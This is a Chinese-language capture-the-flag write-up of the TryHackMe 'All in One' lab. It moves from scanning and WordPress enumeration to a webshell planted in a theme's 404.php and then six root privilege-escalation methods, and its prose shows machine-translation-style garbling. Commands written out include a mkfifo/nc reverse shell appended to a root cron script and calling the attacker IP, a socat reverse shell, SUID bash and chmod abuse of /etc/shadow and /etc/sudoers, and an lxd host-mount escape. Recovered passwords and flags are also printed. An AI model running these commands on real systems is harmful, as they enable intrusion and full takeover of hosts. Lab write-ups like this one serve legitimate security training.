服务发现
┌──(rootkali)-[~/tryhackme/allinone]└─# nmap -sV -Pn 10.10.167.81 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-28 05:58 EDTNmap scan report for 10.10.167.81Host is up (0.31s latency).Not shown: 997 closed portsPORT STATE SERVICE VERSION21/tcp open ftp vsftpd 3.0.322/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)80/tcp open http Apache httpd 2.4.29 ((Ubuntu))Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 14.24 secondsftp服务枚举
ftp能够匿名登录
无任何文件发现
也不可以上传文件到ftp
用其余用户名登录ftp会提醒This FTP server is anonymous only.
爆破目录
┌──(rootkali)-[~/dirsearch]└─# python3 dirsearch.py -w /usr/share/wordlists/Web-Content/directory-list-2.3-medium.txt -e* -t 100 -u http://10.10.167.81 _|. _ _ _ _ _ _|_ v0.3.8 (_||| _) (/_(_|| (_| ) Extensions: * | HTTP method: get | Threads: 100 | Wordlist size: 220521Error Log: /root/dirsearch/logs/errors-21-09-28_05-59-27.logTarget: http://10.10.167.81 [05:59:28] Starting: [05:59:32] 200 - 11KB - / [05:59:36] 301 - 316B - /wordpress -> http://10.10.167.81/wordpress/[05:59:57] 200 - 197B - /hackathons [06:05:57] 403 - 277B - /server-status Task Completed http://10.10.167.81/wordpress/是一个wordpress站点
wordpress开掘
┌──(rootkali)-[~/tryhackme/allinone]└─# wpscan --url http://10.10.167.81/wordpress/_______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.14 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart_______________________________________________________________[i] It seems like you have not updated the database for some time.[?] Do you want to update now? [Y]es [N]o, default: [N]N[+] URL: http://10.10.167.81/wordpress/ [10.10.167.81][+] Started: Tue Sep 28 06:20:29 2021Interesting Finding(s):[+] Headers | Interesting Entry: Server: Apache/2.4.29 (Ubuntu) | Found By: Headers (Passive Detection) | Confidence: 100%[+] XML-RPC seems to be enabled: http://10.10.167.81/wordpress/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access[+] WordPress readme found: http://10.10.167.81/wordpress/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100%[+] Upload directory has listing enabled: http://10.10.167.81/wordpress/wp-content/uploads/ | Found By: Direct Access (Aggressive Detection) | Confidence: 100%[+] The external WP-Cron seems to be enabled: http://10.10.167.81/wordpress/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299[+] WordPress version 5.5.1 identified (Insecure, released on 2020-09-01). | Found By: Rss Generator (Passive Detection) | - http://10.10.167.81/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=5.5.1</generator> | - http://10.10.167.81/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.5.1</generator>[+] WordPress theme in use: twentytwenty | Location: http://10.10.167.81/wordpress/wp-content/themes/twentytwenty/ | Last Updated: 2021-07-22T00:00:00.000Z | Readme: http://10.10.167.81/wordpress/wp-content/themes/twentytwenty/readme.txt | [!] The version is out of date, the latest version is 1.8 | Style URL: http://10.10.167.81/wordpress/wp-content/themes/twentytwenty/style.css?ver=1.5 | Style Name: Twenty Twenty | Style URI: https://wordpress.org/themes/twentytwenty/ | Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor... | Author: the WordPress team | Author URI: https://wordpress.org/ | | Found By: Css Style In Homepage (Passive Detection) | | Version: 1.5 (80% confidence) | Found By: Style (Passive Detection) | - http://10.10.167.81/wordpress/wp-content/themes/twentytwenty/style.css?ver=1.5, Match: 'Version: 1.5'[+] Enumerating All Plugins (via Passive Methods)[+] Checking Plugin Versions (via Passive and Aggressive Methods)[i] Plugin(s) Identified:[+] mail-masta | Location: http://10.10.167.81/wordpress/wp-content/plugins/mail-masta/ | Latest Version: 1.0 (up to date) | Last Updated: 2014-09-19T07:52:00.000Z | | Found By: Urls In Homepage (Passive Detection) | | Version: 1.0 (100% confidence) | Found By: Readme - Stable Tag (Aggressive Detection) | - http://10.10.167.81/wordpress/wp-content/plugins/mail-masta/readme.txt | Confirmed By: Readme - ChangeLog Section (Aggressive Detection) | - http://10.10.167.81/wordpress/wp-content/plugins/mail-masta/readme.txt[+] reflex-gallery | Location: http://10.10.167.81/wordpress/wp-content/plugins/reflex-gallery/ | Latest Version: 3.1.7 (up to date) | Last Updated: 2021-03-10T02:38:00.000Z | | Found By: Urls In Homepage (Passive Detection) | | Version: 3.1.7 (80% confidence) | Found By: Readme - Stable Tag (Aggressive Detection) | - http://10.10.167.81/wordpress/wp-content/plugins/reflex-gallery/readme.txt[+] Enumerating Config Backups (via Passive and Aggressive Methods) Checking Config Backups - Time: 00:00:09 <=============================================================================================================================================================> (137 / 137) 100.00% Time: 00:00:09[i] No Config Backups Found.[!] No WPScan API Token given, as a result vulnerability data has not been output.[!] You can get a free API token with 50 daily requests by registering at https://wpscan.com/register[+] Finished: Tue Sep 28 06:20:42 2021[+] Requests Done: 139[+] Cached Requests: 40[+] Data Sent: 37.39 KB[+] Data Received: 19.909 KB[+] Memory used: 213.031 MB首页呈现一个账号信息:elyana。经登陆测试验证是非法账号。确认wordpress版本5.5.1
爆破wordpress站点目录
┌──(rootkali)-[~/dirsearch]└─# python3 dirsearch.py -w /usr/share/wordlists/Web-Content/directory-list-2.3-medium.txt -e* -t 100 -u http://10.10.167.81/wordpress _|. _ _ _ _ _ _|_ v0.3.8(_||| _) (/_(_|| (_| )Extensions: * | HTTP method: get | Threads: 100 | Wordlist size: 220521Error Log: /root/dirsearch/logs/errors-21-09-29_01-44-29.logTarget: http://10.10.167.81/wordpress[01:44:30] Starting: [01:44:35] 301 - 327B - /wordpress/wp-content -> http://10.10.167.81/wordpress/wp-content/[01:44:39] 301 - 328B - /wordpress/wp-includes -> http://10.10.167.81/wordpress/wp-includes/[01:44:39] 200 - 28KB - /wordpress/ [01:45:02] 301 - 325B - /wordpress/wp-admin -> http://10.10.167.81/wordpress/wp-admin/ Task Completedwp-includes能够看到文件list
爆破/hackathons,无发现
http://10.10.167.81/hackathons里显示了一句话
Damn how much I hate the smell of Vinegar :/ !!!
源代码有两行正文
Dvc W@iyur@123 KeepGoing Vinegar是一种加密算法,中文名叫维吉尼亚明码,以下援用自维基百科
维吉尼亚明码是应用一系列凯撒明码组成明码字母表的加密算法,属于多表明码的一种简略模式。 维吉尼亚明码曾多次被创造。该办法最早记录在吉奥万·巴蒂斯塔·贝拉索于1553年所著的书《吉奥万·巴蒂斯塔·贝拉索学生的明码》中。然而,起初在19世纪时被误传为是法国外交官布莱斯·德·维吉尼亚所发明,因而当初被称为“维吉尼亚明码”
应用这个网站Dvc W@iyur@123 是明码串KeepGoing 是加解密的key
解密当前的明文是:Try H@ckme@123
用elyana : H@ckme@123登录wordpress后盾
在theme editer里找到404.php,把webshell写到模板里,拜访一个不存在的页面,触发发弹shell
──(rootkali)-[~/tryhackme/allinone]└─# nc -lnvp 1234 listening on [any] 1234 ...connect to [10.13.21.169] from (UNKNOWN) [10.10.167.81] 59420Linux elyana 4.15.0-118-generic #119-Ubuntu SMP Tue Sep 8 12:30:01 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux 07:44:14 up 2:10, 0 users, load average: 0.00, 0.00, 0.00USER TTY FROM LOGIN@ IDLE JCPU PCPU WHATuid=33(www-data) gid=33(www-data) groups=33(www-data)/bin/sh: 0: can't access tty; job control turned off$ cd /home$ lselyana$ cd elyana$ ls -alhtotal 48Kdrwxr-xr-x 6 elyana elyana 4.0K Oct 7 2020 .drwxr-xr-x 3 root root 4.0K Oct 5 2020 ..-rw------- 1 elyana elyana 1.6K Oct 7 2020 .bash_history-rw-r--r-- 1 elyana elyana 220 Apr 4 2018 .bash_logout-rw-r--r-- 1 elyana elyana 3.7K Apr 4 2018 .bashrcdrwx------ 2 elyana elyana 4.0K Oct 5 2020 .cachedrwxr-x--- 3 root root 4.0K Oct 5 2020 .configdrwx------ 3 elyana elyana 4.0K Oct 5 2020 .gnupgdrwxrwxr-x 3 elyana elyana 4.0K Oct 5 2020 .local-rw-r--r-- 1 elyana elyana 807 Apr 4 2018 .profile-rw-r--r-- 1 elyana elyana 0 Oct 5 2020 .sudo_as_admin_successful-rw-rw-r-- 1 elyana elyana 59 Oct 6 2020 hint.txt-rw------- 1 elyana elyana 61 Oct 6 2020 user.txt$ cat hint.txtElyana's user password is hidden in the system. Find it ;)$ 没有权限拜访user.txt,必须横向提权到elyana的账号
传linpeas到靶机,发现一个root的定时工作有可写权限,能够间接跳过横向提权到root,另外还有几个提权办法,这里一一介绍
提权办法1:Cron
思路是把一个反弹shell写到cron工作里,开启监听期待工作执行
须要留神这台靶机很多反弹办法都不能应用,须要一一测试
这里用的是rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.21.169 4242 >/tmp/f
参考这里的办法
$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.21.169 4242 >/tmp/f" >> /var/backups/script.sh$ cat /var/backups/script.sh#!/bin/bash#Just a test script, might use it later to for a cron task rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.21.169 4242 >/tmp/f$ 开启监听,拿到user和root的flag,须要base64解密
┌──(rootkali)-[~/dirsearch]└─# nc -lnvp 4242 1 ⨯listening on [any] 4242 ...connect to [10.13.21.169] from (UNKNOWN) [10.10.167.81] 48544/bin/sh: 0: can't access tty; job control turned off# iduid=0(root) gid=0(root) groups=0(root)# cat /home/elyana/user.txtVEhNezQ5amc2NjZhbGI1ZTc2c2hydXNuNDlqZzY2NmFsYjVlNzZzaHJ1c259# cat /root/root.txtVEhNe3VlbTJ3aWdidWVtMndpZ2I2OHNuMmoxb3NwaTg2OHNuMmoxb3NwaTh9# 提权办法2 sudo滥用:socat
因为这台机器只装置了python3,所以咱们要用python3切换tty
python3 -c "import pty;pty.spawn('/bin/bash')"
用find找到elyana相干的文件
bash-4.4$ find / -user elyana -type f 2>/dev/null find / -user elyana -type f 2>/dev/null/home/elyana/user.txt/home/elyana/.bash_logout/home/elyana/hint.txt/home/elyana/.bash_history/home/elyana/.profile/home/elyana/.sudo_as_admin_successful/home/elyana/.bashrc/etc/mysql/conf.d/private.txtbash-4.4$ cat /etc/mysql/conf.d/private.txtcat /etc/mysql/conf.d/private.txtuser: elyanapassword: E@syR18ght找到ssh凭证:elyana:E@syR18ght
咱们登陆到elyana的账号,查看elyana的sudo权限
┌──(rootkali)-[~]└─# ssh elyana@10.10.167.81elyana@10.10.167.81's password: Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-118-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information disabled due to load higher than 1.0 * Canonical Livepatch is available for installation. - Reduce system reboots and improve kernel security. Activate at: https://ubuntu.com/livepatch16 packages can be updated.0 updates are security updates.Last login: Fri Oct 9 08:09:56 2020-bash-4.4$ whoamielyana-bash-4.4$ sudo -lMatching Defaults entries for elyana on elyana: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser elyana may run the following commands on elyana: (ALL) NOPASSWD: /usr/bin/socat提权
-bash-4.4$ sudo socat stdin exec:/bin/shiduid=0(root) gid=0(root) groups=0(root)whoamiroot咱们查看linpease枚举的本机的所有SUID,很多都是能够拿来提权的
-rwsr-xr-x 1 root root 43K Sep 16 2020 /bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8 -rwsr-xr-x 1 root root 63K Jun 28 2019 /bin/ping-rwsr-xr-x 1 root root 31K Aug 11 2016 /bin/fusermount (Unknown SUID binary)-rwsr-xr-x 1 root root 44K Mar 22 2019 /bin/su-rwsr-sr-x 1 root root 1.1M Jun 6 2019 /bin/bash-rwsr-sr-x 1 root root 59K Jan 18 2018 /bin/chmod-rwsr-xr-x 1 root root 27K Sep 16 2020 /bin/umount ---> BSD/Linux(08-1996)-rwsr-xr-- 1 root messagebus 42K Jun 11 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper (Unknown SUID binary)-rwsr-xr-x 1 root root 427K Mar 4 2019 /usr/lib/openssh/ssh-keysign-rwsr-xr-x 1 root root 10K Mar 28 2017 /usr/lib/eject/dmcrypt-get-device (Unknown SUID binary)-rwsr-xr-x 1 root root 99K Nov 23 2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic-rwsr-xr-x 1 root root 111K Jul 10 2020 /usr/lib/snapd/snap-confine ---> Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304)-rwsr-xr-x 1 root root 14K Mar 27 2019 /usr/lib/policykit-1/polkit-agent-helper-1-rwsr-xr-x 1 root root 37K Mar 22 2019 /usr/bin/newuidmap-rwsr-xr-x 1 root root 22K Mar 27 2019 /usr/bin/pkexec ---> Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)-rwsr-sr-x 1 root root 11M Nov 23 2018 /usr/bin/lxc (Unknown SUID binary)-rwsr-xr-x 1 root root 19K Jun 28 2019 /usr/bin/traceroute6.iputils-rwsr-xr-x 1 root root 37K Mar 22 2019 /usr/bin/newgidmap-rwsr-xr-x 1 root root 75K Mar 22 2019 /usr/bin/chfn ---> SuSE_9.3/10-rwsr-xr-x 1 root root 44K Mar 22 2019 /usr/bin/chsh (Unknown SUID binary)-rwsr-xr-x 1 root root 40K Mar 22 2019 /usr/bin/newgrp ---> HP-UX_10.20-rwsr-xr-x 1 root root 146K Jan 31 2020 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable-rwsr-sr-x 1 root root 392K Apr 4 2018 /usr/bin/socat-rwsr-xr-x 1 root root 75K Mar 22 2019 /usr/bin/gpasswd-rwsr-sr-x 1 daemon daemon 51K Feb 20 2018 /usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)-rwsr-xr-x 1 root root 59K Mar 22 2019 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)提权办法3 SUID:socat
socat同时也是一个SUID,咱们根据SUID提权
在攻击机开启监听:socat file:`tty`,raw,echo=0 tcp-listen:12345
在靶机执行:sudo /usr/bin/socat tcp-connect:10.13.21.169:12345 exec:/bin/sh,pty,stderr,setsid,sigint,sane
返回root的反弹shell
┌──(rootkali)-[~]└─# socat file:`tty`,raw,echo=0 tcp-listen:12345/bin/sh: 0: can't access tty; job control turned off# iduid=0(root) gid=0(root) groups=0(root)# whoamiroot# 提权办法4 SUID:bash
-bash-4.4$ /bin/bash -pbash-4.4# iduid=1000(elyana) gid=1000(elyana) euid=0(root) egid=0(root) groups=0(root),4(adm),27(sudo),108(lxd),1000(elyana)bash-4.4# whoamirootbash-4.4# 提权办法5 SUID:chmod
这个命令的思路是通过chmod批改一些敏感文件的权限,使得这些文件可读可写,从而晋升本人的权限
-bash-4.4$ ls -alh /etc/sudoers-r--r----- 1 root root 772 Oct 6 2020 /etc/sudoers-bash-4.4$ /bin/chmod 777 /etc/sudoers-bash-4.4$ ls -alh /etc/sudoers-rwxrwxrwx 1 root root 772 Oct 6 2020 /etc/sudoers-bash-4.4$ /bin/chmod 777 /etc/shadow-bash-4.4$ ls -alh /etc/shadow-rwxrwxrwx 1 root shadow 981 Oct 6 2020 /etc/shadow提权办法6 lxd组用户提权
这个办法的操作流程在之前我的这台靶机里有具体记录
bash-4.4$ wget http://10.13.21.169:8000/alpine-v3.8-i686-20210926_2341.tar.gz--2021-09-29 09:42:52-- http://10.13.21.169:8000/alpine-v3.8-i686-20210926_2341.tar.gzConnecting to 10.13.21.169:8000... connected.HTTP request sent, awaiting response... 200 OKLength: 2684439 (2.6M) [application/gzip]Saving to: ‘alpine-v3.8-i686-20210926_2341.tar.gz’alpine-v3.8-i686-20210926_2341.tar.gz 100%[========================================================================================================================================>] 2.56M 722KB/s in 3.6s 2021-09-29 09:42:56 (722 KB/s) - ‘alpine-v3.8-i686-20210926_2341.tar.gz’ saved [2684439/2684439]bash-4.4$ lsalpine-v3.8-i686-20210926_2341.tar.gz p.txt systemd-private-cdd8179bf3ba4745b2f268da926b2a33-systemd-resolved.service-qOqtw7f systemd-private-cdd8179bf3ba4745b2f268da926b2a33-apache2.service-qmXFBf systemd-private-cdd8179bf3ba4745b2f268da926b2a33-systemd-timesyncd.service-PIgav5bash-4.4$ lxc image import ./alpine-v3.8-i686-20210926_2341.tar.gz --alias myimageImage imported with fingerprint: a4b76201ae71d9a5e56acf1263f61546a77a4086779729bb254d47cd24cb6829bash-4.4$ lxc init myimage ignite -c security.privileged=trueCreating ignitebash-4.4$ lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=trueDevice mydevice added to ignitebash-4.4$ lxc start ignitebash-4.4$ lxc exec ignite /bin/sh~ # iduid=0(root) gid=0(root)~ # cd /mnt/root//mnt/root # lsbin cdrom etc initrd.img lib lost+found mnt proc run snap sys usr vmlinuzboot dev home initrd.img.old lib64 media opt root sbin srv tmp var vmlinuz.old/mnt/root # cd root//mnt/root/root # pwd/mnt/root/root/mnt/root/root # lsroot.txt/mnt/root/root # cat root.txtVEhNe3VlbTJ3aWdidWVtMndpZ2I2OHNuMmoxb3NwaTg2OHNuMmoxb3NwaTh9/mnt/root/root # 这里列出了6种提权的办法,但我感觉应该还有其余办法,这里就不再测试了。如果你晓得其余提权的思路,请留言通知我: )